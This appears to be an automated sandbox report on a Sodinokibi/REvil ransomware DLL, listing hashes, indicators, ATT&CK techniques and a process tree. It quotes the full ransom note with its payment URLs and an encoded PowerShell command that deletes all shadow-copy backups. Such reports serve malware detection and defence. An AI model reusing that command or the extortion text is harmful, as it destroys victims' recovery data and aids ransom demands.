sodinokibi | f860a3c27f44b98d953d05da28a474945b308a1b83d83ae7e6d4c20d1c06b30b

General

Target

366809d2d9ed25f5cc201660542fa9db_JaffaCakes118.dll
Size

166KB
MD5

366809d2d9ed25f5cc201660542fa9db
SHA1

9ee1d0ed426c36a0cd5df47d954ca39c892ede35
SHA256

f860a3c27f44b98d953d05da28a474945b308a1b83d83ae7e6d4c20d1c06b30b
SHA512

04cc3fe1b01b760c8f7f28ecfbb704989252346768656c11fa28878e0738ffcea50c4d023290f8cf61d9e944b3a4312275b34ede0dc8a39c67eb316c40d54592
SSDEEP

3072:JLFrb30BRtBZZg+i2ayyYOCWGPyLydrkxMT3QlGLMlPso:NJ0BXScFyfC3Hd4ygMS0

Score

10^/10

sodinokibi ransomware

Malware Config

Extracted

Path

C:\Users\vxc5y43-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension vxc5y43. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/488A02A80B01158F 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/488A02A80B01158F Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: PtqhptXa30P52Ly6InmGp1Mu5ONx2+SqYJjudLFIpMJ3IRCHOnjdAdhyl5TK8M9K 2BR3WnZi59+zlmSotrsm5+VWo4zv+j9fh010+Ap09Hq6qowBwpUVkQs3VHYDa7qL MWb55+szPOXUq4ZWpFlid31xsVCVNbTQySdTUp7I1XODZzb4C6MHku221NVXQKI1 lcJejm5zbWmPV262PkOkG0Uza58iCbay58vcI09Kxids7cXpKGf38yruq+tK40GT 9Z5ijbrW6tvUWW+VJP3cr9c+J2sXI14f+q6qlZ6FTqNASusssHNSIcv9vD7h2BH8 CEnMjXxsYiKegV5qMU7nU2oAT3U5khKLRb28bMPUVcDqhxJr6b+EbFQB2l9d6Ufc sVlndGqm+9+aMXYY1x4ZQrvp8srCVRLN7MmX/JFxKNxnj5j/jp5hrYne+K5FEKHv tyjGTHMa5N7F36J2Bkbhw+88ewI4tTqAuj9W4NkYc+Fy5NAAhfTkFlwubI74oVR+ VblISEqB7o1ddqm/WppQXntqK8QSUCTAJS5ftke46zEWu50lY4VCX4qnp/E3/XUP BpLmiRyI4YsqXkhvkIOb9lfNXzg3Q/43GSnFNO+2R1dkJwJh1FbfxT2b0USEMxSa ipJxYkJW9p2zBIS44HYfIM4HuHyvTIKoXzrHVfJHLSsMgfkeefG7OcwnhL8nUWdQ ItSWP+nkfWrDabeLPHYolQWis2gDknAebJ+T+WX5bupPxpyccN1kbthXUtZPF89u f2U+g6ujAaKNOrzBxWMq6LcbMjmgRkG7cXYPjNnEvLbvY7TDqoXvGtDpDjVWcoLr Yt3CaKGzsHEW9uBSUECc/gveZzOQ9ak6BvIK6SX+fNHY0j30kqO1k0usU3JFbPIa bkxIbnWpov6OujL5iMm3TAIcELN1xEJwfGyaOEp29VkmHlWViEm0OvJIiWpxGC84 eoB73o0I/879QA5qqy98ToxsVUUKUotCCx7DLO5h9lmdGSJldp2nNi/qFpHUSLCt OKg051zLV0I/BZBd81YMB4+ye+8jAVc7j7smfmG689aQZNTqhTcVHq237yoMofiJ AlbPIOOLjz60oHQW5Ty7tb2vPnyzSrjF02n9cttp3TyOpaHc8XZ7/mUR1PRbDQO4 t2g2Chic1KSgWFaaSqejYsVnNILyDZwSZK6NJ1WVE26OeJy0kOlXV4eSn7pCLREV DzQWOMjROuTSITnZTSu9E3jotWn+VLsCWwid4ML99f0rgCRHOeMdLcOtx6vkVQUa rLJotVFhiGPtX+TH/INs1mABYPgRl0e7AqpNiiQ+q2mKhHZ2k/eOaFDGVMA1LOHw uJYW/6KfqPLS5zNEgVeG0Jb8CB7Xv7lcBWb316uuPVKYDA== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/488A02A80B01158F

http://decryptor.cc/488A02A80B01158F

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi

Enumerates connected drives 3 TTPs 25 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Z:	rundll32.exe
File opened (read-only)	\??\B:	rundll32.exe
File opened (read-only)	\??\M:	rundll32.exe
File opened (read-only)	\??\N:	rundll32.exe
File opened (read-only)	\??\V:	rundll32.exe
File opened (read-only)	\??\A:	rundll32.exe
File opened (read-only)	\??\K:	rundll32.exe
File opened (read-only)	\??\L:	rundll32.exe
File opened (read-only)	\??\R:	rundll32.exe
File opened (read-only)	\??\P:	rundll32.exe
File opened (read-only)	\??\U:	rundll32.exe
File opened (read-only)	\??\W:	rundll32.exe
File opened (read-only)	\??\X:	rundll32.exe
File opened (read-only)	\??\D:	rundll32.exe
File opened (read-only)	\??\E:	rundll32.exe
File opened (read-only)	\??\O:	rundll32.exe
File opened (read-only)	\??\Q:	rundll32.exe
File opened (read-only)	\??\T:	rundll32.exe
File opened (read-only)	\??\Y:	rundll32.exe
File opened (read-only)	\??\F:	rundll32.exe
File opened (read-only)	\??\H:	rundll32.exe
File opened (read-only)	\??\I:	rundll32.exe
File opened (read-only)	\??\J:	rundll32.exe
File opened (read-only)	\??\S:	rundll32.exe
File opened (read-only)	\??\G:	rundll32.exe

Drops file in Program Files directory 26 IoCs

description	ioc	Process
File opened for modification	\??\c:\program files\CompressReceive.pps	rundll32.exe
File opened for modification	\??\c:\program files\ConvertFromSync.mpg	rundll32.exe
File opened for modification	\??\c:\program files\GroupRestart.wma	rundll32.exe
File opened for modification	\??\c:\program files\ResetPing.TTS	rundll32.exe
File opened for modification	\??\c:\program files\SelectSync.xlsm	rundll32.exe
File created	\??\c:\program files (x86)\microsoft sql server compact edition\vxc5y43-readme.txt	rundll32.exe
File opened for modification	\??\c:\program files\EditSubmit.xhtml	rundll32.exe
File opened for modification	\??\c:\program files\GrantMerge.M2TS	rundll32.exe
File opened for modification	\??\c:\program files\OutTrace.vst	rundll32.exe
File created	\??\c:\program files (x86)\microsoft sql server compact edition\v3.5\vxc5y43-readme.txt	rundll32.exe
File opened for modification	\??\c:\program files\BlockSet.wmf	rundll32.exe
File opened for modification	\??\c:\program files\GetUnpublish.aifc	rundll32.exe
File opened for modification	\??\c:\program files\JoinExpand.mp2	rundll32.exe
File opened for modification	\??\c:\program files\RevokeOpen.odt	rundll32.exe
File opened for modification	\??\c:\program files\UpdateBackup.htm	rundll32.exe
File created	\??\c:\program files (x86)\microsoft sql server compact edition\v3.5\desktop\vxc5y43-readme.txt	rundll32.exe
File created	\??\c:\program files\vxc5y43-readme.txt	rundll32.exe
File opened for modification	\??\c:\program files\FormatCheckpoint.css	rundll32.exe
File opened for modification	\??\c:\program files\SearchInitialize.otf	rundll32.exe
File opened for modification	\??\c:\program files\SearchSplit.wmv	rundll32.exe
File opened for modification	\??\c:\program files\ClearConvertTo.asx	rundll32.exe
File opened for modification	\??\c:\program files\PushDisconnect.easmx	rundll32.exe
File created	\??\c:\program files (x86)\vxc5y43-readme.txt	rundll32.exe
File opened for modification	\??\c:\program files\CompareSync.sql	rundll32.exe
File opened for modification	\??\c:\program files\DebugSearch.emz	rundll32.exe
File opened for modification	\??\c:\program files\LimitMove.cr2	rundll32.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1968	rundll32.exe
2860	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	1968	rundll32.exe
Token: SeDebugPrivilege	2860	powershell.exe
Token: SeBackupPrivilege	2496	vssvc.exe
Token: SeRestorePrivilege	2496	vssvc.exe
Token: SeAuditPrivilege	2496	vssvc.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 2236 wrote to memory of 1968	2236	rundll32.exe	28
PID 2236 wrote to memory of 1968	2236	rundll32.exe	28
PID 2236 wrote to memory of 1968	2236	rundll32.exe	28
PID 2236 wrote to memory of 1968	2236	rundll32.exe	28
PID 2236 wrote to memory of 1968	2236	rundll32.exe	28
PID 2236 wrote to memory of 1968	2236	rundll32.exe	28
PID 2236 wrote to memory of 1968	2236	rundll32.exe	28
PID 1968 wrote to memory of 2860	1968	rundll32.exe	29
PID 1968 wrote to memory of 2860	1968	rundll32.exe	29
PID 1968 wrote to memory of 2860	1968	rundll32.exe	29
PID 1968 wrote to memory of 2860	1968	rundll32.exe	29

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\366809d2d9ed25f5cc201660542fa9db_JaffaCakes118.dll,#1
1⤵
- Suspicious use of WriteProcessMemory
PID:2236
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\366809d2d9ed25f5cc201660542fa9db_JaffaCakes118.dll,#1
  2⤵
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1968
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2860

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3056

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2496

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\vxc5y43-readme.txt

Filesize
6KB

MD5
2e0a5b7d1282314e0ce5b8f3904781e1

SHA1
35f8e155fb9ceeb06b64efb7323303b4ed112de0

SHA256
533dceea4d5155e0b03294a563642690018edd5aae165635b07fc98627a1e8b0

SHA512
0d306b78e20775aa6a22a6cb0bf949c909c4651815f89ad68a7d06a393285abb2ec3114e363f32a6faf32186a3e755b4d4951da677e789ad86fdc66a25c59f00

Download Submit
memory/2860-4-0x000007FEF63CE000-0x000007FEF63CF000-memory.dmp

Filesize
4KB

Download
memory/2860-5-0x000000001B640000-0x000000001B922000-memory.dmp

Filesize
2.9MB

Download
memory/2860-6-0x0000000002860000-0x0000000002868000-memory.dmp

Filesize
32KB

Download
memory/2860-7-0x000007FEF6110000-0x000007FEF6AAD000-memory.dmp

Filesize
9.6MB

Download
memory/2860-8-0x000007FEF6110000-0x000007FEF6AAD000-memory.dmp

Filesize
9.6MB

Download
memory/2860-9-0x000007FEF6110000-0x000007FEF6AAD000-memory.dmp

Filesize
9.6MB

Download
memory/2860-10-0x000007FEF6110000-0x000007FEF6AAD000-memory.dmp

Filesize
9.6MB

Download
memory/2860-11-0x000007FEF6110000-0x000007FEF6AAD000-memory.dmp

Filesize
9.6MB

Download
memory/2860-12-0x000007FEF6110000-0x000007FEF6AAD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing